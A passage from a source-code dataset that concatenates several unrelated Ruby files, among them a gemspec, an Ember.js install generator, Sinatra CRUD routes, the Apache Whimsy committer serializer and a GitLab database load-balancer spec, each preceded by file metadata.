end
| 32.571429 | 78 | 0.798246 |
ab6cf319900ebae992c4f956338751531fe60eb2 | 922 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'json_structure/version'
Gem::Specification.new do |spec|
spec.name = "json_structure"
spec.version = JsonStructure::VERSION
spec.authors = ["Kaido Iwamoto"]
spec.email = ["[email protected]"]
if spec.respond_to?(:metadata)
end
spec.summary = %q{JSON structure checker}
spec.description = %q{}
spec.homepage = "http://github.com/odiak/json_structure"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.8"
spec.add_development_dependency "rake", "~> 10.0"
end
| 32.928571 | 104 | 0.636659 |
ac9f57487862082bb0451a597e76a7e6abf368fc | 344 | module SHD
class EnvironmentChecker
def self.check!
return if !ENV["GITHUB_TOKEN"].nil? && !ENV["GITHUB_TOKEN"].empty?
REQUIRED_ENV.each do |key|
if ENV[key].nil? || ENV[key].empty?
Logger.fatal "`#{key}` is missing from the environment, exiting"
exit(-1)
end
end
end
end
end
| 21.5 | 74 | 0.584302 |
791bd383c8b4db7f9f5bf18385b8fb4d7e366167 | 400 | require 'spec_helper'
describe "Comparisons" do
describe "create a new comparison" do
it "should show a flash message on success" do
=begin
visit msruns_path
click_button("Add To Comparison Set One")
click_button("Add To Comparison Set Two")
click_button("Compare")
page.should have_content("started")
response.status.should be(200)
=end
end
end
end
| 23.529412 | 50 | 0.6925 |
7944802f29a4719c1533376cfe62d1323c2e3d4f | 7,371 | require 'whimsy/asf/memapps'
class Committer
def self.serialize(id, env)
response = {}
person = ASF::Person.find(id)
person.reload!
return unless person.attrs['cn']
response[:id] = id
response[:member] = person.asf_member?
# reformat the timestamp
m = person.createTimestamp.match(/^(\d\d\d\d)(\d\d)(\d\d)/)
if m
response[:createTimestamp] = m[1] + '-' + m[2] + '-' + m[3]
else # should not happen, but ...
response[:createTimestamp] = person.createTimestamp
end
name = {}
if person.icla
name[:public_name] = person.public_name
if id == env.user or ASF::Person.find(env.user).asf_member?
name[:legal_name] = person.icla.legal_name
end
end
unless person.attrs['cn'].empty?
name[:ldap] = person.attrs['cn'].first.force_encoding('utf-8')
end
unless (person.attrs['givenName'] || []).empty?
name[:given_name] = person.attrs['givenName'].first.force_encoding('utf-8')
end
unless person.attrs['sn'].empty?
name[:family_name] = person.attrs['sn'].first.force_encoding('utf-8')
end
response[:name] = name
response[:email_forward] = person.mail # forwarding
response[:email_alt] = person.alt_email # alternates
response[:email_other] = person.all_mail - person.mail - person.alt_email # others (ASF mail/ICLA mail if different)
unless person.pgp_key_fingerprints.empty?
response[:pgp] = person.pgp_key_fingerprints
end
unless person.ssh_public_keys.empty?
response[:ssh] = person.ssh_public_keys
end
response[:host] = person.attrs['host'] || ['(none)']
response[:inactive] = person.inactive?
if person.attrs['asf-sascore']
response[:sascore] = person.attrs['asf-sascore'].first # should only be one, but is returned as array
end
if person.attrs['githubUsername']
response[:githubUsername] = person.attrs['githubUsername'] # always return array
end
response[:urls] = person.urls unless person.urls.empty?
response[:committees] = person.committees.map(&:name)
response[:groups] = person.services
response[:committer] = []
response[:podlings] = []
pmcs = ASF::Committee.pmcs
pmc_names = pmcs.map(&:name) # From CI
podlings = ASF::Podling.current.map(&:id)
# Add group names unless they are a PMC group
person.groups.map(&:name).each do |group|
unless pmc_names.include? group
response[:groups] << group
end
end
# Get project(member) details
person.projects.map(&:name).each do |project|
if pmc_names.include? project
# Don't show committer karma if person has committee karma
unless response[:committees].include? project
# LDAP project group
response[:committer] << project
end
elsif podlings.include? project
response[:podlings] << project
else
# TODO should this populate anything?
end
end
ASF::Authorization.new('asf').each do |group, members|
response[:groups] << group if members.include? id
end
ASF::Authorization.new('pit').each do |group, members|
response[:groups] << group if members.include? id
end
response[:committees].sort!
response[:groups].sort!
response[:committer].sort!
response[:podlings].sort!
member = {} # collect member info
inMembersTxt = ASF::Member.find(id) # i.e. present in members.txt
if inMembersTxt
# This is public
member[:status] = ASF::Member.status[id] || 'Active'
end
response[:forms] = {}
if ASF::Person.find(env.user).asf_member? # i.e. member karma
if person.icla and person.icla.claRef # Not all people have iclas
claRef = person.icla.claRef.untaint
file = ASF::ICLAFiles.match_claRef(claRef)
if file
url =ASF::SVN.svnurl('iclas')
response[:forms][:icla] = "#{url}/#{file}"
end
end
if inMembersTxt
member[:info] = person.members_txt
if person.icla # not all members have iclas
file = ASF::MemApps.find1st(person)
if file
url = ASF::SVN.svnurl('member_apps')
response[:forms][:member] = "#{url}/#{file}"
end
end
file = ASF::EmeritusFiles.find(person)
if file
url = ASF::SVN.svnurl('emeritus')
response[:forms][:emeritus] = "#{url}/#{file}"
end
file = ASF::EmeritusRequestFiles.find(person)
if file
url = ASF::SVN.svnurl('emeritus-requests-received')
response[:forms][:emeritus_request] = "#{url}/#{file}"
end
file = ASF::EmeritusRescindedFiles.find(person)
if file
url = ASF::SVN.svnurl('emeritus-requests-rescinded')
response[:forms][:emeritus_rescinded] = "#{url}/#{file}"
end
file = ASF::EmeritusReinstatedFiles.find(person)
if file
url = ASF::SVN.svnurl('emeritus-reinstated')
response[:forms][:emeritus_reinstated] = "#{url}/#{file}"
end
else
if person.member_nomination
member[:nomination] = person.member_nomination
end
end
else # not an ASF member; no karma for ICLA docs so don't add link
response[:forms][:icla] = '' if person.icla and person.icla.claRef
end
response[:member] = member unless member.empty?
if ASF::Person.find(env.user).asf_member? or env.user == id
response[:moderates] = {}
require 'whimsy/asf/mlist'
ASF::MLIST.moderates(person.all_mail, response)
end
auth = Auth.info(env)
if env.user == id or auth[:root] or auth[:secretary]
require 'whimsy/asf/mlist'
ASF::MLIST.subscriptions(person.all_mail, response) # updates response[:subscriptions]
# (Does not update the response if the digest info is not available)
ASF::MLIST.digests(person.all_mail, response)
# Check for missing private@ subscriptions
response[:privateNosub] = []
end
# chair info is public, so let everyone see it
response[:chairOf] = []
response[:committees].each do |cttee|
pmc = ASF::Committee.find(cttee)
chairs = pmc.chairs.map {|x| x[:id]}
response[:chairOf] << cttee if chairs.include?(id)
# mailing list info is not public ...
if response[:subscriptions] # did we get access to the mail?
pmail = "private@#{pmc.mail_list}.apache.org" rescue ''
subbed = false
response[:subscriptions].each do |sub|
if sub[0] == pmail
subbed = true
end
end
response[:privateNosub] << cttee unless subbed
end
end
response[:pmcs] = []
response[:nonpmcs] = []
pmcs.each do |pmc|
response[:pmcs] << pmc.name if pmc.roster.include?(person.id)
response[:chairOf] << pmc.name if pmc.chairs.map{|ch| ch[:id]}.include?(person.id)
end
response[:pmcs].sort!
response[:nonPMCchairOf] = [] # use separate list to avoid missing pmc-chair warnings
nonpmcs = ASF::Committee.nonpmcs
nonpmcs.each do |nonpmc|
response[:nonpmcs] << nonpmc.name if nonpmc.roster.include?(person.id)
response[:nonPMCchairOf] << nonpmc.name if nonpmc.chairs.map{|ch| ch[:id]}.include?(person.id)
end
response[:nonpmcs].sort!
response
end
end
| 30.458678 | 120 | 0.622711 |
d57cc1470cd2069d9f079af9f1a0493ff1cd4d44 | 6,494 | require 'generators/ember/generator_helpers'
require 'net/http'
require 'uri'
require 'fileutils'
module Ember
module Generators
class InstallGenerator < ::Rails::Generators::Base
class InvalidChannel < ::Thor::Error; end
class ConflictingOptions < ::Thor::Error; end
class InsufficientOptions < ::Thor::Error; end
::InvalidChannel = InvalidChannel
::ConflictingOptions = ConflictingOptions
::InsufficientOptions = InsufficientOptions
desc "Install Ember.js into your vendor folder"
class_option :head,
:type => :boolean,
:default => false,
:desc => "Download Ember.js & Ember data from canary channel. This is deprecated. Use channel instead."
class_option :channel,
:type => :string,
:required => false,
:desc => "Ember release channel Choose between 'release', 'beta' or 'canary'"
class_option :ember_only,
:type => :boolean,
:required => false,
:desc => "Only download Ember.",
:aliases => '--ember'
class_option :ember_data_only,
:type => :boolean,
:required => false,
:desc => "Only download ember-data",
:aliases => '--ember-data'
class_option :tag,
:type => :string,
:required => false,
:desc => "Download tagged release use syntax v1.0.0-beta.3/ember-data & v1.0.0-rc.8/ember"
def initialize(args = [], options = {}, config = {})
super(args, options, config)
check_options
process_options
end
def ember
begin
unless options.ember_data_only?
get_ember_js_for(:development)
get_ember_js_for(:production)
end
rescue Thor::Error
say('WARNING: no ember files on this channel or tag' , :yellow)
end
end
def ember_data
begin
unless options.ember_only?
get_ember_data_for(:development)
get_ember_data_for(:production)
end
rescue Thor::Error
say('WARNING: no ember-data files on this channel or tag' , :yellow)
end
end
private
def get_ember_data_for(environment)
# temporarily using a variable here until a stable release of
# ember-data is released so that installing with ember-data
# *just works*.
chan = if channel.to_s == 'release'
say_status("warning:", 'Ember Data is not available on the :release channel. Falling back to beta channel.' , :yellow)
:beta
else
channel
end
create_file "vendor/assets/ember/#{environment}/ember-data.js" do
fetch url_for(chan, 'ember-data', environment), "vendor/assets/ember/#{environment}/ember-data.js"
end
sourcemap_url = "#{base_url}/#{chan}/ember-data.js.map"
if resource_exist?(sourcemap_url)
create_file "vendor/assets/ember/#{environment}/ember-data.js.map" do
fetch sourcemap_url, "vendor/assets/ember/#{environment}/ember-data.js.map", false
end
end
end
def get_ember_js_for(environment)
create_file "vendor/assets/ember/#{environment}/ember.js" do
fetch url_for(channel, 'ember', environment), "vendor/assets/ember/#{environment}/ember.js"
end
end
def url_for(channel, component, environment)
base = "#{base_url}/#{channel}/#{component}"
case environment
when :production
"#{base}.min.js"
when :development
if resource_exist?("#{base}.debug.js")
"#{base}.debug.js" # Ember.js 1.10.0.beta.1 or later
else
"#{base}.js"
end
end
end
def check_options
if options.head?
say('WARNING: --head option is deprecated in favor of --channel=canary' , :yellow)
end
if options.head? && options.channel?
say 'ERROR: conflicting options. --head and --channel. Use either --head or --channel=<channel>', :red
raise ConflictingOptions
end
if options.channel? && !%w(release beta canary).include?(options[:channel])
say 'ERROR: channel can either be release, beta or canary', :red
raise InvalidChannel
end
if options.channel? && options.tag?
say 'ERROR: conflicting options. --tag and --channel. --tag is incompatible with other options', :red
raise ConflictingOptions
end
if options.head? && options.tag?
say 'ERROR: conflicting options. --tag and --head. --tag is incompatible with other options', :red
raise ConflictingOptions
end
if options.tag? && !(options.ember_only? || options.ember_data_only?)
say 'ERROR: insufficient options. --tag needs to be combined with eithe --ember or --ember-data', :red
raise InsufficientOptions
end
end
def process_options
if options.head?
@channel = :canary
end
if options.tag?
@channel = "tags/#{options.tag}"
end
end
def base_url
'http://builds.emberjs.com'
end
def channel
if options.channel
@channel ||= options[:channel]
else
@channel ||= :release
end
end
def fetch(from, to, prepend_verbose = true)
message = "#{from} -> #{to}"
say_status("downloading:", message , :green)
uri = URI(from)
output = StringIO.new
if prepend_verbose
output.puts "// Fetched from channel: #{channel}, with url " + uri.to_s
output.puts "// Fetched on: " + Time.now.utc.iso8601.to_s
end
response = Net::HTTP.get_response(uri)
case response.code
when '404'
say "ERROR: Error reading the content from the channel with url #{from}. File not found" , :red
raise Thor::Error
when '200'
output.puts response.body.force_encoding("UTF-8")
else
say "ERROR: Unexpected error with status #{response.code} reading the content from the channel with url #{from}." , :red
raise Thor::Error
end
output.rewind
content = output.read
end
def resource_exist?(target)
uri = URI(target)
response = Net::HTTP.new(uri.host, uri.port).head(uri.path)
response.code == '200'
end
end
end
end
| 32.633166 | 130 | 0.590391 |
916371613778b9559b6c5fb50f60007dce76e0fe | 933 | # frozen_string_literal: true
module Gitlab
module ImportExport
module Group
class RelationFactory < Base::RelationFactory
OVERRIDES = {
labels: :group_labels,
priorities: :label_priorities,
label: :group_label,
parent: :epic
}.freeze
EXISTING_OBJECT_RELATIONS = %i[
epic
epics
milestone
milestones
label
labels
group_label
group_labels
].freeze
private
def setup_models
setup_note if @relation_name == :notes
update_group_references
end
def update_group_references
return unless self.class.existing_object_relations.include?(@relation_name)
return unless @relation_hash['group_id']
@relation_hash['group_id'] = @importable.id
end
end
end
end
end
| 21.697674 | 85 | 0.573419 |
181a8424ec9e5f2b3609c145f9d4adda2ad2e44e | 530 | require 'yaml'
require 'hashr'
require 'travis/config/helpers'
module Travis
class Config < Hashr
class Files
include Helpers
def load
filenames.inject({}) do |config, filename|
deep_merge(config, load_file(filename)[Config.env] || {})
end
end
private
def load_file(filename)
YAML.load_file(filename) || {} rescue {}
end
def filenames
@filenames ||= Dir['config/{travis.yml,travis/*.yml}'].sort
end
end
end
end
| 18.928571 | 69 | 0.581132 |
62704946a07aa0ab0cf162acfd696be58a0d429b | 122 | class AddTimestampsToPrayers < ActiveRecord::Migration[5.1]
def change
add_timestamps :prayers, null: true
end
end
| 20.333333 | 59 | 0.770492 |
0382fd5a9310e033a08f7bf0ededcdba3bbe99b2 | 4,570 | ##
# Generated by "rake sinatra:from_rails:classic OUTPUT_FILE=/Users/nwiger/Workspace/sinatra_from_rails/spec/output/main_xml.rb FORMAT=xml RENDER=builder"
# Keep up to date: http://github.com/nateware/sinatra_from_rails
#
# Categories
get '/categories.xml' do
@categories = Category.all
@categories.to_xml
end
get '/categories/:id.xml' do
@category = Category.find(params[:id])
@category.to_xml
end
post '/categories/:id/details.xml' do
@category = Category.view(params[:policy_type], params[:platform],
session[:region_code] || Setting[:default_region],
session[:language_code] || Setting[:default_language],
params[:username])
builder :'categories/view'
end
get '/categories/new.xml' do
@category = Category.new
@category.to_xml
end
post '/categories.xml' do
@category = Category.new(params[:category])
if @category.save
@category.to_xml
else
@category.errors.to_xml
end
end
put '/categories/:id.xml' do
@category = Category.find(params[:id])
raise InvalidCategory if [params[:a], params[:b]].include? '123'
if @category.update_attributes(params[:category])
halt 200
else
@category.errors.to_xml
end
end
delete '/categories/:id.xml' do
@category = Category.find(params[:id])
@category.destroy
halt 200
end
# Complexes
get '/complexes.xml' do
@complexes = Complex.all
@complexes.to_xml
end
get '/complexes/:id.xml' do
if params[:username]
@complex = Complex.find_by_username(params[:username])
else
@complex = Complex.find(params[:id])
end
@complex.to_xml
end
get '/complexes/new.xml' do
@complex = Complex.new
@complex.to_xml
end
post '/complexes.xml' do
@complex = Complex.new(params[:complex])
if @complex.save
@complex.to_xml
else
@complex.errors.to_xml
end
end
put '/complexes/:id.xml' do
@complex = Complex.find(params[:id])
if @complex.update_attributes(params[:complex])
halt 200
else
@complex.errors.to_xml
end
end
get '/complexes/search.xml' do
@complex =
if ! params[:search].nil?
Complex.search(params)
elsif ! params[:search_tags].nil?
Complex.tags_search(params)
end
raise "Insufficient input to search with - please provide a value for either the 'search' or 'search_tags' request parameters." if params[:search].nil? && params[:search_tags].nil?
builder :'complexes/search'
end
delete '/complexes/:id.xml' do
@complex = Complex.find(params[:id])
@complex.destroy
halt 200
end
# Posts
get '/posts.xml' do
@posts = Post.all
@posts.to_xml
end
get '/posts/:id.xml' do
@post = Post.find(params[:id])
@post.to_xml
end
get '/posts/new.xml' do
@post = Post.new
@post.to_xml
end
post '/posts.xml' do
@post = Post.new(params[:post])
if @post.save
@post.to_xml
else
@post.errors.to_xml
end
end
put '/posts/:id.xml' do
@post = Post.find(params[:id])
if @post.update_attributes(params[:post])
halt 200
else
@post.errors.to_xml
end
end
delete '/posts/:id.xml' do
@post = Post.find(params[:id])
@post.destroy
halt 200
end
# Topic categories
get '/topic_categories.xml' do
@topic_categories = TopicCategory.all
@topic_categories.to_xml
end
get '/topic_categories/:id.xml' do
@topic_category = TopicCategory.find(params[:id])
@topic_category.to_xml
end
get '/topic_categories/new.xml' do
@topic_category = TopicCategory.new
@topic_category.to_xml
end
post '/topic_categories.xml' do
@topic_category = TopicCategory.new(params[:topic_category])
if @topic_category.save
@topic_category.to_xml
else
@topic_category.errors.to_xml
end
end
put '/topic_categories/:id.xml' do
@topic_category = TopicCategory.find(params[:id])
if @topic_category.update_attributes(params[:topic_category])
halt 200
else
@topic_category.errors.to_xml
end
end
delete '/topic_categories/:id.xml' do
@topic_category = TopicCategory.find(params[:id])
@topic_category.destroy
halt 200
end
# Users
get '/users.xml' do
@users = User.all
@users.to_xml
end
get '/users/:id.xml' do
@user = User.find(params[:id])
@user.to_xml
end
get '/users/new.xml' do
@user = User.new
@user.to_xml
end
post '/users.xml' do
@user = User.new(params[:user])
if @user.save
@user.ticket = Ticket.generate
@user.to_xml
else
@user.errors.to_xml
end
end
put '/users/:id.xml' do
@user = User.find(params[:id])
if @user.update_attributes(params[:user])
halt 200
else
@user.errors.to_xml
end
end
delete '/users/:id.xml' do
@user = User.find(params[:id])
@user.destroy
halt 200
end
| 19.869565 | 182 | 0.698687 |
28d9d922ab1d064e92485be7cf7be9ce23f0c95b | 3,589 | # encoding: UTF-8
# frozen_string_literal: true
require_relative '../validations'
module API
module V2
module Account
class Deposits < Grape::API
before { deposits_must_be_permitted! }
desc 'Get your deposits history.',
is_array: true,
success: API::V2::Entities::Deposit
params do
optional :currency,
type: String,
values: { value: -> { Currency.enabled.codes(bothcase: true) }, message: 'account.currency.doesnt_exist' },
desc: 'Currency code'
optional :state,
type: String,
values: { value: -> { Deposit::STATES.map(&:to_s) }, message: 'account.deposit.invalid_state' }
optional :limit,
type: { value: Integer, message: 'account.deposit.non_integer_limit' },
values: { value: 1..100, message: 'account.deposit.invalid_limit' },
default: 100,
desc: "Number of deposits per page (defaults to 100, maximum is 100)."
optional :page,
type: { value: Integer, message: 'account.deposit.non_integer_page' },
values: { value: -> (p){ p.try(:positive?) }, message: 'account.deposit.non_positive_page'},
default: 1,
desc: 'Page number (defaults to 1).'
end
get "/deposits" do
currency = Currency.find(params[:currency]) if params[:currency].present?
current_user.deposits.order(id: :desc)
.tap { |q| q.where!(currency: currency) if currency }
.tap { |q| q.where!(aasm_state: params[:state]) if params[:state] }
.tap { |q| present paginate(q), with: API::V2::Entities::Deposit }
end
desc 'Get details of specific deposit.' do
success API::V2::Entities::Deposit
end
params do
requires :txid,
type: String,
allow_blank: false,
desc: "Deposit transaction id"
end
get "/deposits/:txid" do
deposit = current_user.deposits.find_by!(txid: params[:txid])
present deposit, with: API::V2::Entities::Deposit
end
desc 'Returns deposit address for account you want to deposit to by currency. ' \
'The address may be blank because address generation process is still in progress. ' \
'If this case you should try again later.',
success: API::V2::Entities::Deposit
params do
requires :currency,
type: String,
values: { value: -> { Currency.coins.enabled.codes(bothcase: true) }, message: 'account.currency.doesnt_exist'},
desc: 'The account you want to deposit to.'
given :currency do
optional :address_format,
type: String,
values: { value: -> { %w[legacy cash] }, message: 'account.deposit_address.invalid_address_format' },
validate_currency_address_format: { value: true, prefix: 'account.deposit_address' },
desc: 'Address format legacy/cash'
end
end
get '/deposit_address/:currency' do
current_user.ac(params[:currency]).payment_address.yield_self do |pa|
{ currency: params[:currency], address: params[:address_format] ? pa.format_address(params[:address_format]) : pa.address }
end
end
end
end
end
end
| 42.223529 | 135 | 0.555865 |
5d8440123e6231f5716c902b65d9663511693ec6 | 12,061 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Database::LoadBalancing::LoadBalancer, :request_store do
let(:conflict_error) { Class.new(RuntimeError) }
let(:db_host) { ActiveRecord::Base.connection_pool.db_config.host }
let(:lb) { described_class.new([db_host, db_host]) }
let(:request_cache) { lb.send(:request_cache) }
before do
stub_const(
'Gitlab::Database::LoadBalancing::LoadBalancer::PG::TRSerializationFailure',
conflict_error
)
end
after do |example|
lb.disconnect!(timeout: 0) unless example.metadata[:skip_disconnect]
end
def raise_and_wrap(wrapper, original)
raise original
rescue original.class
raise wrapper, 'boop'
end
def wrapped_exception(wrapper, original)
raise_and_wrap(wrapper, original.new)
rescue wrapper => error
error
end
def twice_wrapped_exception(top, middle, original)
begin
raise_and_wrap(middle, original.new)
rescue middle => middle_error
raise_and_wrap(top, middle_error)
end
rescue top => top_error
top_error
end
describe '#initialize' do
it 'ignores the hosts when the primary_only option is enabled' do
lb = described_class.new([db_host], primary_only: true)
hosts = lb.host_list.hosts
expect(hosts.length).to eq(1)
expect(hosts.first)
.to be_instance_of(Gitlab::Database::LoadBalancing::PrimaryHost)
end
end
describe '#read' do
it 'yields a connection for a read' do
connection = double(:connection)
host = double(:host)
allow(lb).to receive(:host).and_return(host)
allow(host).to receive(:query_cache_enabled).and_return(true)
expect(host).to receive(:connection).and_return(connection)
expect { |b| lb.read(&b) }.to yield_with_args(connection)
end
it 'ensures that query cache is enabled' do
connection = double(:connection)
host = double(:host)
allow(lb).to receive(:host).and_return(host)
allow(host).to receive(:query_cache_enabled).and_return(false)
allow(host).to receive(:connection).and_return(connection)
expect(host).to receive(:enable_query_cache!).once
lb.read { 10 }
end
it 'marks hosts that are offline' do
allow(lb).to receive(:connection_error?).and_return(true)
expect(lb.host_list.hosts[0]).to receive(:offline!)
expect(lb).to receive(:release_host)
raised = false
returned = lb.read do
unless raised
raised = true
raise
end
10
end
expect(returned).to eq(10)
end
it 'retries a query in the event of a serialization failure' do
raised = false
expect(lb).to receive(:release_host)
returned = lb.read do
unless raised
raised = true
raise conflict_error
end
10
end
expect(returned).to eq(10)
end
it 'retries every host at most 3 times when a query conflict is raised' do
expect(lb).to receive(:release_host).exactly(6).times
expect(lb).to receive(:read_write)
lb.read { raise conflict_error }
end
it 'uses the primary if no secondaries are available' do
allow(lb).to receive(:connection_error?).and_return(true)
expect(lb.host_list.hosts).to all(receive(:online?).and_return(false))
expect(lb).to receive(:read_write).and_call_original
expect { |b| lb.read(&b) }
.to yield_with_args(ActiveRecord::Base.retrieve_connection)
end
it 'uses the primary when the primary_only option is enabled' do
lb = described_class.new(primary_only: true)
# When no hosts are configured, we don't want to produce any warnings, as
# they aren't useful/too noisy.
expect(Gitlab::Database::LoadBalancing::Logger).not_to receive(:warn)
expect { |b| lb.read(&b) }
.to yield_with_args(ActiveRecord::Base.retrieve_connection)
end
end
describe '#read_write' do
it 'yields a connection for a write' do
connection = ActiveRecord::Base.connection_pool.connection
expect { |b| lb.read_write(&b) }.to yield_with_args(connection)
end
it 'uses a retry with exponential backoffs' do
expect(lb).to receive(:retry_with_backoff).and_yield
lb.read_write { 10 }
end
end
describe '#host' do
it 'returns the secondary host to use' do
expect(lb.host).to be_an_instance_of(Gitlab::Database::LoadBalancing::Host)
end
it 'stores the host in a thread-local variable' do
request_cache.delete(described_class::CACHE_KEY)
expect(lb.host_list).to receive(:next).once.and_call_original
lb.host
lb.host
end
it 'does not create conflicts with other load balancers when caching hosts' do
lb1 = described_class.new([db_host, db_host], ActiveRecord::Base)
lb2 = described_class.new([db_host, db_host], Ci::CiDatabaseRecord)
host1 = lb1.host
host2 = lb2.host
expect(lb1.send(:request_cache)[described_class::CACHE_KEY]).to eq(host1)
expect(lb2.send(:request_cache)[described_class::CACHE_KEY]).to eq(host2)
end
end
describe '#release_host' do
it 'releases the host and its connection' do
host = lb.host
expect(host).to receive(:disable_query_cache!)
lb.release_host
expect(request_cache[described_class::CACHE_KEY]).to be_nil
end
end
describe '#release_primary_connection' do
it 'releases the connection to the primary' do
expect(ActiveRecord::Base.connection_pool).to receive(:release_connection)
lb.release_primary_connection
end
end
describe '#primary_write_location' do
it 'returns a String in the right format' do
expect(lb.primary_write_location).to match(%r{[A-F0-9]{1,8}/[A-F0-9]{1,8}})
end
it 'raises an error if the write location could not be retrieved' do
connection = double(:connection)
allow(lb).to receive(:read_write).and_yield(connection)
allow(connection).to receive(:select_all).and_return([])
expect { lb.primary_write_location }.to raise_error(RuntimeError)
end
end
describe '#retry_with_backoff' do
it 'returns the value returned by the block' do
value = lb.retry_with_backoff { 10 }
expect(value).to eq(10)
end
it 're-raises errors not related to database connections' do
expect(lb).not_to receive(:sleep) # to make sure we're not retrying
expect { lb.retry_with_backoff { raise 'boop' } }
.to raise_error(RuntimeError)
end
it 'retries the block when a connection error is raised' do
allow(lb).to receive(:connection_error?).and_return(true)
expect(lb).to receive(:sleep).with(2)
expect(lb).to receive(:release_primary_connection)
raised = false
returned = lb.retry_with_backoff do
unless raised
raised = true
raise
end
10
end
expect(returned).to eq(10)
end
it 're-raises the connection error if the retries did not succeed' do
allow(lb).to receive(:connection_error?).and_return(true)
expect(lb).to receive(:sleep).with(2).ordered
expect(lb).to receive(:sleep).with(4).ordered
expect(lb).to receive(:sleep).with(16).ordered
expect(lb).to receive(:release_primary_connection).exactly(3).times
expect { lb.retry_with_backoff { raise } }.to raise_error(RuntimeError)
end
end
describe '#connection_error?' do
before do
stub_const('Gitlab::Database::LoadBalancing::LoadBalancer::CONNECTION_ERRORS',
[NotImplementedError])
end
it 'returns true for a connection error' do
error = NotImplementedError.new
expect(lb.connection_error?(error)).to eq(true)
end
it 'returns true for a wrapped connection error' do
wrapped = wrapped_exception(ActiveRecord::StatementInvalid, NotImplementedError)
expect(lb.connection_error?(wrapped)).to eq(true)
end
it 'returns true for a wrapped connection error from a view' do
wrapped = wrapped_exception(ActionView::Template::Error, NotImplementedError)
expect(lb.connection_error?(wrapped)).to eq(true)
end
it 'returns true for deeply wrapped/nested errors' do
top = twice_wrapped_exception(ActionView::Template::Error, ActiveRecord::StatementInvalid, NotImplementedError)
expect(lb.connection_error?(top)).to eq(true)
end
it 'returns true for an invalid encoding error' do
error = RuntimeError.new('invalid encoding name: unicode')
expect(lb.connection_error?(error)).to eq(true)
end
it 'returns false for errors not related to database connections' do
error = RuntimeError.new
expect(lb.connection_error?(error)).to eq(false)
end
it 'returns false for ActiveRecord errors without a cause' do
error = ActiveRecord::RecordNotUnique.new
expect(lb.connection_error?(error)).to eq(false)
end
end
describe '#serialization_failure?' do
let(:conflict_error) { Class.new(RuntimeError) }
before do
stub_const(
'Gitlab::Database::LoadBalancing::LoadBalancer::PG::TRSerializationFailure',
conflict_error
)
end
it 'returns for a serialization error' do
expect(lb.serialization_failure?(conflict_error.new)).to eq(true)
end
it 'returns true for a wrapped error' do
wrapped = wrapped_exception(ActionView::Template::Error, conflict_error)
expect(lb.serialization_failure?(wrapped)).to eq(true)
end
end
describe '#select_up_to_date_host' do
let(:location) { 'AB/12345'}
let(:hosts) { lb.host_list.hosts }
let(:set_host) { request_cache[described_class::CACHE_KEY] }
subject { lb.select_up_to_date_host(location) }
context 'when none of the replicas are caught up' do
before do
expect(hosts).to all(receive(:caught_up?).with(location).and_return(false))
end
it 'returns false and does not update the host thread-local variable' do
expect(subject).to be false
expect(set_host).to be_nil
end
end
context 'when any of the replicas is caught up' do
before do
# `allow` for non-caught up host, because we may not even check it, if will find the caught up one earlier
allow(hosts[0]).to receive(:caught_up?).with(location).and_return(false)
expect(hosts[1]).to receive(:caught_up?).with(location).and_return(true)
end
it 'returns true and sets host thread-local variable' do
expect(subject).to be true
expect(set_host).to eq(hosts[1])
end
end
end
describe '#create_replica_connection_pool' do
it 'creates a new connection pool with specific pool size and name' do
with_replica_pool(5, 'other_host') do |replica_pool|
expect(replica_pool)
.to be_kind_of(ActiveRecord::ConnectionAdapters::ConnectionPool)
expect(replica_pool.db_config.host).to eq('other_host')
expect(replica_pool.db_config.pool).to eq(5)
expect(replica_pool.db_config.name).to end_with("_replica")
end
end
it 'allows setting of a custom hostname and port' do
with_replica_pool(5, 'other_host', 5432) do |replica_pool|
expect(replica_pool.db_config.host).to eq('other_host')
expect(replica_pool.db_config.configuration_hash[:port]).to eq(5432)
end
end
it 'does not modify connection class pool' do
expect { with_replica_pool(5) { } }.not_to change { ActiveRecord::Base.connection_pool }
end
def with_replica_pool(*args)
pool = lb.create_replica_connection_pool(*args)
yield pool
ensure
pool&.disconnect!
end
end
describe '#disconnect!' do
it 'calls disconnect on all hosts with a timeout', :skip_disconnect do
expect_next_instances_of(Gitlab::Database::LoadBalancing::Host, 2) do |host|
expect(host).to receive(:disconnect!).with(timeout: 30)
end
lb.disconnect!(timeout: 30)
end
end
end
| 29.417073 | 117 | 0.67996 |
79fdd22cf1083df5fbcc2c4026e30bf34646172c | 1,435 | class Lambchop::Cat
def self.cat(function_name, invoke_args, options = {})
self.new(function_name, invoke_args, options).cat
end
def initialize(function_name, invoke_args, options = {})
@function_name = function_name
@invoke_args = invoke_args
@client = options[:client] || Aws::Lambda::Client.new
@out = options[:out] || $stdout
@options = options
end
def cat
invoke_args = @invoke_args
if invoke_args.kind_of?(IO)
invoke_args = invoke_args.read
end
resp = @client.invoke(
:function_name => @function_name,
:payload => invoke_args,
:invocation_type => Lambchop::Utils.camelize(@options[:invocation_type] || :request_response),
:log_type => Lambchop::Utils.camelize(@options[:log_type] || :none)
)
out = {
'status_code' => resp[:status_code],
'function_error' => resp[:function_error],
'payload' => nil
}
log_result = resp[:log_result]
payload = resp[:payload]
if log_result
log_result = Base64.strict_decode64(log_result)
log_result.gsub!("\t", ' ').gsub!(/\s+\n/, "\n").strip!
def log_result.yaml_style() Psych::Nodes::Scalar::LITERAL end
out['log_result'] = log_result
end
if payload
payload_string = payload.string
out['payload'] = JSON.parse(payload_string) rescue payload_string
end
@out.puts YAML.dump(out)
end
end
| 27.596154 | 100 | 0.634843 |
e8b2c0d4adbd71568b15f28d8d36a2cda134056b | 315 | class AddNewCommunitySettings < ActiveRecord::Migration[5.2]
def change
add_column :communities, :facebook_connect_id, :string
add_column :communities, :facebook_connect_secret, :string
add_column :communities, :google_analytics_key, :string
add_column :communities, :favicon_url, :string
end
end
| 35 | 62 | 0.784127 |
abf29f9d95c6cc12094d930420de84b494487c4a | 2,142 | # This code is derived from the SOM benchmarks, see AUTHORS.md file.
#
# Copyright (c) 2015-2016 Stefan Marr <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
